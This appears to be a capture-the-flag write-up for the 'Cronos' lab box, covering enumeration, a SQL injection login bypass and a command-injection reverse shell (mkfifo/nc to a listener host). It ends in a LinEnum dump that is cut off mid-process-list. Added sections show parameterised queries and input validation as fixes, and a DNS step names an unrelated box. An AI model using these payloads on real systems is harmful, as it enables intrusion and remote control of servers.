CronOs Write-up (TodoSec, http://todotest.local/cronos-write-up/, published Tue, 16 May 2023 15:44:02 +0000)

# Pentest Report – Cronos

## Enumeration

### Port Scan

#### TCP

```bash
sudo nmap $1 -A -p- -sC -sV -Pn -oN nmap
Nmap scan report for 10.10.10.13
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_ 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
```

#### UDP

```less
sudo nmap $1 -sU -A --top-ports 25 --min-rate 5000 -oN nmap_udp
Nmap scan report for 10.10.10.13
Host is up (0.042s latency).

PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
111/udp open|filtered rpcbind
123/udp closed ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
998/udp closed puparp
1434/udp open|filtered ms-sql-m
1701/udp open|filtered L2TP
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
49152/udp open|filtered unknown
49154/udp open|filtered unknown
```

#### Vulnerability Scan

```less
sudo nmap $1 -p- --script vuln --min-rate 800 -Pn -oN nmap_vuln
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
```

### DNS Enumeration

#### Query Domain Name

```bash
nslookup
> server
Default server: 10.10.11.166
Address: 10.10.11.166#53
>
;; communications error to 10.10.11.166#53: timed out
166.11.10.10.in-addr.arpa name = trick.htb
>
```

#### Get DNS Records

```bash
nslookup -type=ANY site.site.com 0.0.0.0
nslookup -type=any cronos.htb 10.10.10.13
Server: 10.10.10.13
Address: 10.10.10.13#53

cronos.htb
origin = cronos.htb
mail addr = admin.cronos.htb
serial = 3
refresh = 604800
retry = 86400
expire = 2419200
minimum = 604800
cronos.htb nameserver = ns1.cronos.htb.
Name: cronos.htb
Address: 10.10.10.13
```

#### Zone Transfer

```bash
dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sat May 06 09:52:03 CEST 2023
;; XFR size: 7 records (messages 1, bytes 203)
```

### HTTP

#### Directory Brute Forcing

```bash
dirsearch -u http://{IP}/ -r --deep-recursive -F -t 100 -x 404,403,400,500
Target: http://cronos.htb:80/

[09:54:22] Starting:
[09:54:27] 200 - 924B - /js
[09:54:33] 200 - 925B - /css
[09:54:34] 200 - 0B - /favicon.ico
[09:54:35] 200 - 2KB - /index.php
[09:54:36] 200 - 924B - /js/ (Added to queue)
[09:54:41] 200 - 24B - /robots.txt
[09:54:44] 200 - 914B - /web.config
[09:54:45] Starting: js/
[09:54:53] 200 - 278KB - /js/app.js

Target: http://ns1.cronos.htb:80/

[09:54:30] Starting:
[09:54:43] 200 - 11KB - /index.html

Target: http://admin.cronos.htb:80/

[09:54:53] Starting:
[09:55:02] 200 - 0B - /config.php
[09:55:05] 200 - 2KB - /index.php
[09:55:05] 200 - 2KB - /index.php/login/

Target: http://www.cronos.htb:80/

[09:55:33] Starting:
[09:55:34] 200 - 928B - /js
[09:55:42] 200 - 929B - /css
[09:55:43] 200 - 0B - /favicon.ico
[09:55:44] 200 - 2KB - /index.php
[09:55:45] 200 - 928B - /js/ (Added to queue)
[09:55:48] 200 - 24B - /robots.txt
[09:55:51] 200 - 914B - /web.config
```

#### Subdomain Enumeration

```bash
gobuster vhost -u http://cronos.htb -t 100 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q -k --no-error
Found: admin.cronos.htb Status: 200 [Size: 1547]
```

#### Spider/Crawling

```sh
gospider -s http://0.0.0.0 -t 50 -d 2 -o .
```

#### Fingerprint

Apache httpd 2.4.18 | PHP

## Exploitation

### Authentication Bypass – Login Page

By injecting SQL code into the login page located at `admin.cronos.htb`, we are able to bypass authentication, granting us access to `/welcome.php`.

Payload: `admin'-- -`
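Why this payload works, as an added example that is not part of the write-up: the login check below is reconstructed two ways, once with the query built by string concatenation (the pattern the bypass relies on) and once with bound parameters. The table layout, the sample account and the use of sqlite3 in place of the target's MySQL are assumptions made for the demo; the real source of the `admin.cronos.htb` login page is not on the page.

```python
"""Login check built two ways: string-concatenated SQL (bypassable) and a
parameterised query (not bypassable).

Added example, not code from the Cronos box. The users table, the sample
account and the use of sqlite3 instead of the target's MySQL are
assumptions made for the demo.
"""
import hashlib
import sqlite3

# The bypass string from the write-up. The trailing "-" matters on MySQL,
# whose "--" comment marker must be followed by whitespace.
PAYLOAD = "admin'-- -"


def _hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def demo_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", _hash("demo-password")))
    db.commit()
    return db


def vulnerable_query(username: str, password: str) -> str:
    """The query text a concatenating handler sends to the database."""
    return ("SELECT COUNT(*) FROM users WHERE username = '" + username +
            "' AND password_hash = '" + _hash(password) + "'")


def vulnerable_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    # With username = "admin'-- -" the WHERE clause becomes
    #   username = 'admin'-- -' AND password_hash = '...'
    # and everything after "--" is a comment: the password is never checked.
    return db.execute(vulnerable_query(username, password)).fetchone()[0] > 0


def safe_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the quote and the comment marker stay inside the
    string value, so this looks up a user literally named "admin'-- -"."""
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = demo_db()
    print("concatenated query:", vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable login with payload:", vulnerable_login(db, PAYLOAD, "anything"))
    print("parameterised login with payload:", safe_login(db, PAYLOAD, "anything"))
```

The fix is the parameterised form alone; escaping the quote would also stop this particular string, but bound parameters remove the whole class of problem because user input never reaches the SQL parser as code.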

### RCE – Insufficient Input Sanitization

If we intercept the POST request that `welcome.php` sends, we can change the `command` field to an arbitrary string and the server executes it as a shell command.

![[Pasted image 20230506101023.png]]

If we inject a URL-encoded reverse shell payload into the command field, we get a reverse shell back on our listener.

```http
command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.14.13+445+>/tmp/f
```

```bash
nc -nlvp 445
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53720
bash: cannot set terminal process group (1321): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$
```
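What the server-side fix looks like, as an added example rather than code from the box: the captured request body above is decoded the way PHP would populate `$_POST['command']`, flagged as an injection attempt, and contrasted with a handler that only ever builds an argv list for an allow-listed tool and never involves a shell. The source of `welcome.php` is not on the page, so the allowed tools (`ping`, `traceroute`) and the `<tool> <target>` field format are assumptions made for the demo.

```python
"""Handling a user-supplied "command" form field: detection of shell
metacharacters, and an allow-listed argv handler instead of a shell.

Added example; the source of welcome.php is not on the page, so the
allowed tools (ping, traceroute) and the "<tool> <target>" field format
are assumptions made for the demo.
"""
import ipaddress
import re
import shlex
import subprocess
from urllib.parse import parse_qs

# Request body captured in the write-up (URL-encoded form data).
CAPTURED_BODY = ("command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i"
                 "+2>%261|nc+10.10.14.13+445+>/tmp/f")

# Assumed allow-list: tool name -> fixed argv prefix.
ALLOWED_TOOLS = {"ping": ["ping", "-c", "1"], "traceroute": ["traceroute"]}

# Characters that give a shell something to do beyond one command.
SHELL_META = re.compile(r"[;|&`$<>\n]")


def decode_command_field(body: str) -> str:
    """Decode the form body the way PHP populates $_POST['command']."""
    return parse_qs(body).get("command", [""])[0]


def is_injection_attempt(field: str) -> bool:
    """Detection-side check: does the field carry shell control characters?"""
    return SHELL_META.search(field) is not None


def build_argv(field: str) -> list:
    """Hardened handler: turn the field into an argv list or refuse.
    No shell is involved, so metacharacters cannot chain commands."""
    if is_injection_attempt(field):
        raise ValueError("shell metacharacters in command field")
    tokens = shlex.split(field)
    if len(tokens) != 2 or tokens[0] not in ALLOWED_TOOLS:
        raise ValueError("expected '<tool> <target>' with an allow-listed tool")
    tool, target = tokens
    ipaddress.ip_address(target)  # raises ValueError unless target is an IP
    return ALLOWED_TOOLS[tool] + [target]


def rejects(field: str) -> bool:
    """True when build_argv refuses the field."""
    try:
        build_argv(field)
    except ValueError:
        return True
    return False


def run_tool(field: str) -> str:
    """Execute the allow-listed tool with an argv list (no shell)."""
    return subprocess.run(build_argv(field), capture_output=True, text=True,
                          timeout=15).stdout


if __name__ == "__main__":
    decoded = decode_command_field(CAPTURED_BODY)
    print("decoded field:", decoded)
    print("injection attempt:", is_injection_attempt(decoded))
    print("hardened handler rejects it:", rejects(decoded))
    print("argv for a legitimate request:", build_argv("ping 10.10.10.13"))
```

`is_injection_attempt` is the logging hook a defender wants: a field that contains `;`, `|` or `>` on a form meant to take one hostname is worth an alert even when the handler refuses it. `build_argv` is the actual control; the allow-list and the IP-only target are deliberately strict and should be widened only to what the page really needs.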

## Privilege Escalation

### Full Linux Shell

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash

target@target:~/.ssh$ ^Z
zsh: suspended nc -nlvp 1234

stty raw -echo; fg
[1] + continued nc -nlvp 1234

target@target:~/.ssh$ export TERM=xterm
```

### Enumeration

#### Linenum Output

```bash
www-data@cronos:/tmp$ ./linenum.sh
./linenum.sh

### SYSTEM ##############################################
[-] Kernel information:
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-72-generic (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

[-] Hostname:
cronos

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Fri Jun 17 13:33:44 +0300 2022
noulis pts/0 10.10.14.141 Thu Jul 27 01:39:12 +0300 2017

[-] Who else is logged on:
11:14:21 up 26 min, 0 users, load average: 0.00, 0.08, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
uid=112(bind) gid=119(bind) groups=119(bind)

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
bind:x:112:119::/var/cache/bind:/bin/false

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K May 10 2022 .
drwxr-xr-x 23 root root 4.0K May 10 2022 ..
drwxr-xr-x 4 noulis noulis 4.0K May 10 2022 noulis

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=2
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /bin
drwxr-xr-x 2 root root 12288 May 10 2022 /sbin
drwxr-xr-x 2 root root 20480 May 10 2022 /usr/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/sbin
drwxr-xr-x 2 root root 12288 May 10 2022 /usr/sbin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen

[-] Current umask value:
0022
u=rwx,g=rx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 797 Apr 9 2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Mar 22 2017 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 6 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 27 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 13 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2023-05-06 12:00:10 EEST 45min left Sat 2023-05-06 10:48:09 EEST 26min ago snapd.refresh.timer snapd.refresh.service
Sat 2023-05-06 22:59:17 EEST 11h left Sat 2023-05-06 10:48:09 EEST 26min ago apt-daily.timer apt-daily.service
Sun 2023-05-07 11:03:20 EEST 23h left Sat 2023-05-06 11:03:20 EEST 11min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING ##########################################
[-] Network and IP info:
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:85:18
inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:8518/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:8518/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:449972 errors:0 dropped:0 overruns:0 frame:0
TX packets:360429 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:51524923 (51.5 MB) TX bytes:142920379 (142.9 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2331 errors:0 dropped:0 overruns:0 frame:0
TX packets:2331 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:226377 (226.3 KB) TX bytes:226377 (226.3 KB)

[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:9d:31 [ether] on ens160

[-] Nameserver(s):
nameserver 10.10.10.2
nameserver 8.8.8.8

[-] Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens160

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.13:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.10.10.13:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 0.5 37936 6032 ? Ss 10:48 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 10:48 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:48 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:48 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S 10:48 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S 10:48 0:00 [kdevtmpfs]
root 12 0.0 0.0 0 0 ? S< 10:48 0:00 [netns]
root 13 0.0 0.0 0 0 ? S< 10:48 0:00 [perf]
root 14 0.0 0.0 0 0 ? S 10:48 0:00 [khungtaskd]
root 15 0.0 0.0 0 0 ? S< 10:48 0:00 [writeback]
root 16 0.0 0.0 0 0 ? SN 10:48 0:00 [ksmd]
root 17 0.0 0.0 0 0 ? SN 10:48 0:00 [khugepaged]
root 18 0.0 0.0 0 0 ? S< 10:48 0:00 [crypto]
root 19 0.0 0.0 0 0 ? S< 10:48 0:00 [kintegrityd]
root 20 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< 10:48 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< 10:48 0:00 [ata_sff]
root 23 0.0 0.0 0 0 ? S< 10:48 0:00 [md]
root 24 0.0 0.0 0 0 ? S< 10:48 0:00 [devfreq_wq]
root 28 0.0 0.0 0 0 ? S 10:48 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< 10:48 0:00 [vmstat]
root 30 0.0 0.0 0 0 ? S 10:48 0:00 [fsnotify_mark]
root 31 0.0 0.0 0 0 ? S 10:48 0:00 [ecryptfs-kthrea]
root 47 0.0 0.0 0 0 ? S< 10:48 0:00 [kthrotld]
root 48 0.0 0.0 0 0 ? S< 10:48 0:00 [acpi_thermal_pm]
root 49 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 50 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 51 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 52 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 53 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 54 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 55 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 56 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 57 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_0]
root 58 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_0]
root 59 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_1]
root 60 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_1]
root 67 0.0 0.0 0 0 ? S< 10:48 0:00 [ipv6_addrconf]
root 80 0.0 0.0 0 0 ? S< 10:48 0:00 [deferwq]
root 81 0.0 0.0 0 0 ? S< 10:48 0:00 [charger_manager]
root 131 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_2]
root 132 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_2]
root 133 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_3]
root 134 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_3]
root 135 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_4]
root 136 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_5]
root 137 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_4]
root 138 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_5]
root 139 0.0 0.0 0 0 ? S< 10:48 0:00 [vmw_pvscsi_wq_4]
root 140 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_6]
root 141 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_6]
root 143 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 144 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_7]
root 147 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_7]
root 150 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_8]
root 151 0.0 0.0 0 0 ? S< 10:48 0:00 [kpsmoused]
root 154 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_8]
root 157 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_9]
root 160 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_9]
root 162 0.0 0.0 0 0 ? S< 10:48 0:00 [ttm_swap]
root 164 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_10]
root 167 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_10]
root 168 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_11]
